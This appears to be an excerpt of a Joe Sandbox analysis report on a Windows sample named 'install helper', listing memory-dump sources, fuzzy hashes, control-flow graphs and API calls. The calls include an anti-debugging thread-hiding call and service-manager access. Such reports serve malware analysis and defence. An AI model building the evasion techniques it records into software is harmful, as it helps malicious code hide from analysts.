                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da5dc642548c6eaf92bb0cb1b725ad8fe32728d88a5c8c35653efc73b14671f5
                                          • Instruction ID: 32f0d11a8595c4bf471b8819d74f1bd10880e628b4263f102e148288d36f1b6d
                                          • Opcode Fuzzy Hash: da5dc642548c6eaf92bb0cb1b725ad8fe32728d88a5c8c35653efc73b14671f5
                                          • Instruction Fuzzy Hash: AD320332245B118FC324CF28C8C06A6B7E3EFD13147699A6DC0EA4BA95D775B44BCB54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7969 6c633a6a-6c633a85 7970 6c633a87-6c633aa7 7969->7970 7971 6c633aa9-6c633ab0 7970->7971 7972 6c633960-6c633964 7971->7972 7973 6c633860-6c63388e 7972->7973 7974 6c63396a 7972->7974 7983 6c633970-6c63397d 7973->7983 7984 6c633894-6c633896 7973->7984 7975 6c633ba1-6c633bb6 7974->7975 7977 6c633bc0-6c633bda call 6c781470 call 6c781480 7975->7977 7993 6c633be0-6c633bfe 7977->7993 7988 6c6339f1-6c6339f8 7983->7988 7989 6c63397f-6c633989 7983->7989 7984->7983 7986 6c63389c-6c6338b9 7984->7986 7992 6c6338c0-6c6338c1 7986->7992 7990 6c633ab5-6c633aba 7988->7990 7991 6c6339fe-6c633a03 7988->7991 7989->7986 7994 6c63398f-6c633994 7989->7994 7990->7986 7998 6c633ac0-6c633ac7 7990->7998 7995 6c6338d2-6c6338d4 7991->7995 7996 6c633a09-6c633a2f 7991->7996 7997 6c63395e 7992->7997 8014 6c633c04-6c633c11 7993->8014 8015 6c633e7b 7993->8015 8000 6c633b16-6c633b18 7994->8000 8001 6c63399a-6c63399f 7994->8001 8004 6c633957-6c63395c 7995->8004 8002 6c633a35-6c633a3a 7996->8002 8003 6c6338f8-6c633955 7996->8003 7997->7972 7998->7992 8005 6c633acd-6c633ad6 7998->8005 8000->7992 8007 6c6339a5-6c6339bf 8001->8007 8008 6c63383b-6c633855 call 6c781470 call 6c781480 8001->8008 8010 6c633a40-6c633a57 8002->8010 8011 6c633b1d-6c633b22 8002->8011 8003->8004 8004->7997 8005->8000 8013 6c633ad8-6c633aeb 8005->8013 8009 6c633a5a-6c633a5d 8007->8009 8008->7973 8009->7971 8010->8009 8016 6c633b24-6c633b44 8011->8016 8017 6c633b49-6c633b50 8011->8017 8013->8003 8022 6c633af1-6c633af8 8013->8022 8018 6c633ce0-6c633cea 8014->8018 8019 6c633c17-6c633c20 8014->8019 8021 6c633e81-6c633ee0 call 6c633750 GetCurrentThread NtSetInformationThread 8015->8021 8016->7970 8017->7992 8025 6c633b56-6c633b5d 8017->8025 8027 6c633d3a-6c633d3c 8018->8027 8028 6c633cec-6c633d0c 8018->8028 8023 6c633c26-6c633c2d 8019->8023 8024 6c633dc5 8019->8024 8043 6c633eea-6c633f04 call 6c781470 call 6c781480 8021->8043 8030 6c633b62-6c633b85 8022->8030 8031 6c633afa-6c633aff 8022->8031 8032 6c633dc3 8023->8032 8033 6c633c33-6c633c3a 8023->8033 8036 6c633dc6 8024->8036 8025->7972 8038 6c633d70-6c633d8d 8027->8038 8039 6c633d3e-6c633d45 8027->8039 8037 6c633d90-6c633d95 8028->8037 8030->8003 8035 6c633b8b 8030->8035 8031->8004 8032->8024 8041 6c633c40-6c633c5b 8033->8041 8042 6c633e26-6c633e2b 8033->8042 8035->7975 8047 6c633dc8-6c633dcc 8036->8047 8045 6c633d97-6c633db8 8037->8045 8046 6c633dba-6c633dc1 8037->8046 8038->8037 8044 6c633d50-6c633d57 8039->8044 8049 6c633e1b-6c633e24 8041->8049 8050 6c633e31 8042->8050 8051 6c633c7b-6c633cd0 8042->8051 8064 6c633f75-6c633fa1 8043->8064 8044->8036 8045->8024 8046->8032 8053 6c633dd7-6c633ddc 8046->8053 8047->7993 8048 6c633dd2 8047->8048 8056 6c633e76-6c633e79 8048->8056 8049->8047 8049->8056 8050->7977 8051->8044 8054 6c633e36-6c633e3d 8053->8054 8055 6c633dde-6c633e17 8053->8055 8059 6c633e3f-6c633e5a 8054->8059 8060 6c633e5c-6c633e5f 8054->8060 8055->8049 8056->8021 8059->8049 8060->8051 8062 6c633e65-6c633e69 8060->8062 8062->8047 8062->8056 8068 6c633fa3-6c633fa8 8064->8068 8069 6c634020-6c634026 8064->8069 8070 6c633fae-6c633fcf 8068->8070 8071 6c63407c-6c634081 8068->8071 8072 6c633f06-6c633f35 8069->8072 8073 6c63402c-6c63403c 8069->8073 8074 6c6340aa-6c6340ae 8070->8074 8071->8074 8075 6c634083-6c63408a 8071->8075 8076 6c633f38-6c633f61 8072->8076 8077 6c6340b3-6c6340b8 8073->8077 8078 6c63403e-6c634058 8073->8078 8080 6c633f6b-6c633f6f 8074->8080 8075->8076 8081 6c634090 8075->8081 8083 6c633f64-6c633f67 8076->8083 8077->8070 8082 6c6340be-6c6340c9 8077->8082 8079 6c63405a-6c634063 8078->8079 8084 6c6340f5-6c63413f 8079->8084 8085 6c634069-6c63406c 8079->8085 8080->8064 8081->8043 8086 6c6340a7 8081->8086 8082->8074 8087 6c6340cb-6c6340d4 8082->8087 8088 6c633f69 8083->8088 8084->8088 8089 6c634072-6c634077 8085->8089 8090 6c634144-6c63414b 8085->8090 8086->8074 8087->8086 8091 6c6340d6-6c6340f0 8087->8091 8088->8080 8089->8083 8090->8080 8091->8079
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: d793962f192c712eb317e755d40f714118a7d847a30565a9f21a3b4f0e8f94ce
                                          • Instruction ID: 7b751cb9f3b5fcaf1b08e7d4ed288f9dcf71ef5b8acf0c439d0428f36432f47a
                                          • Opcode Fuzzy Hash: d793962f192c712eb317e755d40f714118a7d847a30565a9f21a3b4f0e8f94ce
                                          • Instruction Fuzzy Hash: 8D51F031105B118FC320CF28C8847D5B7E3BF91314F69AA6DC0EA1BA95DB79B44B8B85
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CurrentThread
                                          • String ID:
                                          • API String ID: 2882836952-0
                                          • Opcode ID: ee5f5162bf21d34888a33b87c743744e319fa8fac667b706e606a4952f2e7fa4
                                          • Instruction ID: 0ebcabb94689490263bd7176810bdbdd0efa578e701d08f281e8661a725ab02b
                                          • Opcode Fuzzy Hash: ee5f5162bf21d34888a33b87c743744e319fa8fac667b706e606a4952f2e7fa4
                                          • Instruction Fuzzy Hash: 9C51E131504B218BC320CF28C4807D5B7E3BF95314F69AA6DC0EA5BA95DB75B44B8B94
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: e9974abaf5932ece2b8b1b79bc34135cf3ddfa5bda68beb2f6c037e438a3f972
                                          • Instruction ID: 19b6a84b1dbeefc673ce8c0abbd98c7e71d0ab4e454ff24f9db33a76e60b4672
                                          • Opcode Fuzzy Hash: e9974abaf5932ece2b8b1b79bc34135cf3ddfa5bda68beb2f6c037e438a3f972
                                          • Instruction Fuzzy Hash: AB313831205B11CFC320CF24C8847D6BBA3AF96314F596E6DC0AA5BA91DBB9700ACB55
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: 84f480fb9bb830b07a8b6b295f333df2602b7ec0936a5bdedf5eda5b01a7b552
                                          • Instruction ID: eddcf281ee65abf9d43990df716d798b359692d7d99971f1c0f6f16398ea7cd6
                                          • Opcode Fuzzy Hash: 84f480fb9bb830b07a8b6b295f333df2602b7ec0936a5bdedf5eda5b01a7b552
                                          • Instruction Fuzzy Hash: B7312331104B118BC720CF28C4947E6BBF2AF92308F656E6DC0EE5BA85DBB57406CB95
                                          APIs
                                          • GetCurrentThread.KERNEL32 ref: 6C633E9D
                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C633EAA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentInformation
                                          • String ID:
                                          • API String ID: 1650627709-0
                                          • Opcode ID: eb4e491c2a84219f2877a47314b6d596ddd13a97dc2926b0f050019fee23f759
                                          • Instruction ID: e0e17a28816ca5fc6f8e7628fd966decffdc25a43659ee65f8e4402fbc694ba3
                                          • Opcode Fuzzy Hash: eb4e491c2a84219f2877a47314b6d596ddd13a97dc2926b0f050019fee23f759
                                          • Instruction Fuzzy Hash: F421F730218B118BD724CF24C8947E6BBB2AF82308F546A2DC0BE4BA91DBB57405CB55
                                          APIs
                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C7B5130
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID:
                                          • API String ID: 1889721586-0
                                          • Opcode ID: 5945863e8c8bd29207118839edb1e4a90e8c2c7c4fb144ea69d1dba2fdd37c11
                                          • Instruction ID: 87f7b93f936b6a15a4d81226f7bbedc217519b92a407ea67fc500b63865cec81
                                          • Opcode Fuzzy Hash: 5945863e8c8bd29207118839edb1e4a90e8c2c7c4fb144ea69d1dba2fdd37c11
                                          • Instruction Fuzzy Hash: 3F3149B4608306EFC7518F28D645A0ABBF4ABCA758F50896AF888D6360C331C845DB57
                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C7AAEDC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: fc2f3b8918c18965bec985acfd7d2a82419202364f8c865d650649bfd0369ce8
                                          • Instruction ID: 71e3839a957aa26753a051cea68de5fc9122c2f498d309346e51bc9ea0adb25a
                                          • Opcode Fuzzy Hash: fc2f3b8918c18965bec985acfd7d2a82419202364f8c865d650649bfd0369ce8
                                          • Instruction Fuzzy Hash: 67113AB45093509FD7148B68D64450EBBE4BF8A324F148E69F4A8CB691D330CC498F66
                                          APIs
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C78ABA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                          • API String ID: 2738559852-1563143607
                                          • Opcode ID: d303100c6991886da40dffd4b1e54e1401865427909787678d0b9ee62be631e4
                                          • Instruction ID: 4ce4718fe4dfdbb727cae38a28ccebf7b5198183b00439da63309154ae691880
                                          • Opcode Fuzzy Hash: d303100c6991886da40dffd4b1e54e1401865427909787678d0b9ee62be631e4
                                          • Instruction Fuzzy Hash: 3F625C7060E3818FC724CF18C590A5ABBE2AFD9714F148D2EE6A9CB791D735E8458B43

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6824 6c7ccad3-6c7ccae3 6825 6c7ccafd-6c7ccaff 6824->6825 6826 6c7ccae5-6c7ccaf8 call 6c7bf9df call 6c7bf9cc 6824->6826 6827 6c7cce64-6c7cce71 call 6c7bf9df call 6c7bf9cc 6825->6827 6828 6c7ccb05-6c7ccb0b 6825->6828 6840 6c7cce7c 6826->6840 6846 6c7cce77 call 6c7c0120 6827->6846 6828->6827 6831 6c7ccb11-6c7ccb37 6828->6831 6831->6827 6835 6c7ccb3d-6c7ccb46 6831->6835 6838 6c7ccb48-6c7ccb5b call 6c7bf9df call 6c7bf9cc 6835->6838 6839 6c7ccb60-6c7ccb62 6835->6839 6838->6846 6843 6c7ccb68-6c7ccb6b 6839->6843 6844 6c7cce60-6c7cce62 6839->6844 6845 6c7cce7f-6c7cce82 6840->6845 6843->6844 6848 6c7ccb71-6c7ccb75 6843->6848 6844->6845 6846->6840 6848->6838 6851 6c7ccb77-6c7ccb8e 6848->6851 6853 6c7ccbdf-6c7ccbe5 6851->6853 6854 6c7ccb90-6c7ccb93 6851->6854 6857 6c7ccbab-6c7ccbc2 call 6c7bf9df call 6c7bf9cc call 6c7c0120 6853->6857 6858 6c7ccbe7-6c7ccbf1 6853->6858 6855 6c7ccb95-6c7ccb9e 6854->6855 6856 6c7ccba3-6c7ccba9 6854->6856 6859 6c7ccc63-6c7ccc73 6855->6859 6856->6857 6860 6c7ccbc7-6c7ccbda 6856->6860 6890 6c7ccd97 6857->6890 6862 6c7ccbf8-6c7ccc16 call 6c7c47f5 call 6c7c47bb * 2 6858->6862 6863 6c7ccbf3-6c7ccbf5 6858->6863 6865 6c7ccd38-6c7ccd41 call 6c7d19e5 6859->6865 6866 6c7ccc79-6c7ccc85 6859->6866 6860->6859 6894 6c7ccc18-6c7ccc2e call 6c7bf9cc call 6c7bf9df 6862->6894 6895 6c7ccc33-6c7ccc5c call 6c7cac69 6862->6895 6863->6862 6879 6c7ccdb4 6865->6879 6880 6c7ccd43-6c7ccd55 6865->6880 6866->6865 6870 6c7ccc8b-6c7ccc8d 6866->6870 6870->6865 6875 6c7ccc93-6c7cccb7 6870->6875 6875->6865 6876 6c7cccb9-6c7ccccf 6875->6876 6876->6865 6881 6c7cccd1-6c7cccd3 6876->6881 6883 6c7ccdb8-6c7ccdd0 ReadFile 6879->6883 6880->6879 6885 6c7ccd57-6c7ccd66 GetConsoleMode 6880->6885 6881->6865 6886 6c7cccd5-6c7cccfb 6881->6886 6888 6c7cce2c-6c7cce37 GetLastError 6883->6888 6889 6c7ccdd2-6c7ccdd8 6883->6889 6885->6879 6891 6c7ccd68-6c7ccd6c 6885->6891 6886->6865 6893 6c7cccfd-6c7ccd13 6886->6893 6896 6c7cce39-6c7cce4b call 6c7bf9cc call 6c7bf9df 6888->6896 6897 6c7cce50-6c7cce53 6888->6897 6889->6888 6898 6c7ccdda 6889->6898 6892 6c7ccd9a-6c7ccda4 call 6c7c47bb 6890->6892 6891->6883 6899 6c7ccd6e-6c7ccd88 ReadConsoleW 6891->6899 6892->6845 6893->6865 6901 6c7ccd15-6c7ccd17 6893->6901 6894->6890 6895->6859 6896->6890 6908 6c7cce59-6c7cce5b 6897->6908 6909 6c7ccd90-6c7ccd96 call 6c7bf9f2 6897->6909 6905 6c7ccddd-6c7ccdef 6898->6905 6906 6c7ccda9-6c7ccdb2 6899->6906 6907 6c7ccd8a GetLastError 6899->6907 6901->6865 6911 6c7ccd19-6c7ccd33 6901->6911 6905->6892 6915 6c7ccdf1-6c7ccdf5 6905->6915 6906->6905 6907->6909 6908->6892 6909->6890 6911->6865 6920 6c7cce0e-6c7cce19 6915->6920 6921 6c7ccdf7-6c7cce07 call 6c7ccefe 6915->6921 6922 6c7cce1b call 6c7cce83 6920->6922 6923 6c7cce25-6c7cce2a call 6c7cd1b6 6920->6923 6932 6c7cce0a-6c7cce0c 6921->6932 6930 6c7cce20-6c7cce23 6922->6930 6923->6930 6930->6932 6932->6892
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 757d3707cd355d2209f43cd4dd3e7bd92084cf9c8e6d33168d0c0727e92f4984
                                          • Instruction ID: 2da4b9fadff74bb49393a98dd6a1e781f18411f479caf220f3b6544b76c79461
                                          • Opcode Fuzzy Hash: 757d3707cd355d2209f43cd4dd3e7bd92084cf9c8e6d33168d0c0727e92f4984
                                          • Instruction Fuzzy Hash: 8DC11774F0424AAFDF01DFA8CA84BADBFB4AF0A319F144169E410A7B41C7719945CB66

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6933 6c7d406c-6c7d409c call 6c7d44ec 6936 6c7d409e-6c7d40a9 call 6c7bf9df 6933->6936 6937 6c7d40b7-6c7d40c3 call 6c7d160c 6933->6937 6944 6c7d40ab-6c7d40b2 call 6c7bf9cc 6936->6944 6942 6c7d40dc-6c7d4125 call 6c7d4457 6937->6942 6943 6c7d40c5-6c7d40da call 6c7bf9df call 6c7bf9cc 6937->6943 6952 6c7d4127-6c7d4130 6942->6952 6953 6c7d4192-6c7d419b GetFileType 6942->6953 6943->6944 6954 6c7d4391-6c7d4395 6944->6954 6958 6c7d4167-6c7d418d GetLastError call 6c7bf9f2 6952->6958 6959 6c7d4132-6c7d4136 6952->6959 6955 6c7d419d-6c7d41ce GetLastError call 6c7bf9f2 CloseHandle 6953->6955 6956 6c7d41e4-6c7d41e7 6953->6956 6955->6944 6970 6c7d41d4-6c7d41df call 6c7bf9cc 6955->6970 6962 6c7d41e9-6c7d41ee 6956->6962 6963 6c7d41f0-6c7d41f6 6956->6963 6958->6944 6959->6958 6964 6c7d4138-6c7d4165 call 6c7d4457 6959->6964 6967 6c7d41fa-6c7d4248 call 6c7d17b0 6962->6967 6963->6967 6968 6c7d41f8 6963->6968 6964->6953 6964->6958 6975 6c7d424a-6c7d4256 call 6c7d4666 6967->6975 6976 6c7d4267-6c7d428f call 6c7d4710 6967->6976 6968->6967 6970->6944 6975->6976 6982 6c7d4258 6975->6982 6983 6c7d4294-6c7d42d5 6976->6983 6984 6c7d4291-6c7d4292 6976->6984 6985 6c7d425a-6c7d4262 call 6c7cb925 6982->6985 6986 6c7d42d7-6c7d42db 6983->6986 6987 6c7d42f6-6c7d4304 6983->6987 6984->6985 6985->6954 6986->6987 6989 6c7d42dd-6c7d42f1 6986->6989 6990 6c7d438f 6987->6990 6991 6c7d430a-6c7d430e 6987->6991 6989->6987 6990->6954 6991->6990 6992 6c7d4310-6c7d4343 CloseHandle call 6c7d4457 6991->6992 6996 6c7d4345-6c7d4371 GetLastError call 6c7bf9f2 call 6c7d171f 6992->6996 6997 6c7d4377-6c7d438b 6992->6997 6996->6997 6997->6990
                                          APIs
                                            • Part of subcall function 6C7D4457: CreateFileW.KERNEL32(00000000,00000000,?,6C7D4115,?,?,00000000,?,6C7D4115,00000000,0000000C), ref: 6C7D4474
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D4180
                                          • __dosmaperr.LIBCMT ref: 6C7D4187
                                          • GetFileType.KERNEL32(00000000), ref: 6C7D4193
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D419D
                                          • __dosmaperr.LIBCMT ref: 6C7D41A6
                                          • CloseHandle.KERNEL32(00000000), ref: 6C7D41C6
                                          • CloseHandle.KERNEL32(6C7CB0D0), ref: 6C7D4313
                                          • GetLastError.KERNEL32 ref: 6C7D4345
                                          • __dosmaperr.LIBCMT ref: 6C7D434C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: 8Q
                                          • API String ID: 4237864984-4022487301
                                          • Opcode ID: d78887c7dfbac650f49e349e41eee1a575dbe4968eaea77aa457c8b5b7c43785
                                          • Instruction ID: 077e229ed13a4fb20be2593681172fec1310ae22bc49fd7f8f9460753a7f7ddf
                                          • Opcode Fuzzy Hash: d78887c7dfbac650f49e349e41eee1a575dbe4968eaea77aa457c8b5b7c43785
